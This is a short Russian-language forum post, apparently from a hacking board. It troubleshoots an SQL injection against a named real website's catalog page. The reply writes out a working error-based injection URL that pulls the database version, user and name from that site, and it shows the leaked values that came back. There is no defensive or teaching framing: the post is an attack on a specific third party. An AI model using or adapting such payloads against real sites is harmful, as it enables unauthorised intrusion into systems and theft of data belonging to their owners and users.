23.04.2011, 14:16
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Fooog
Похоже что это sql-inj
Но вот когда начинаю искать количество столбцов (order by) перекидывает на другую страницу. Как с таким быть?
http://www.cue.ru/catalog.php?pid=1'
pid=1)+order+by+1/*
upd:
Код HTML:
http://www.cue.ru/catalog.php?pid=1)+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)a+group+by+mid(concat_ws(0x3a,version(),user(),database()),floor(rand(0)*2),64))/*
4.1.15-Debian_1-log:qp_newcue@localhost:qp_newcue
|
|
|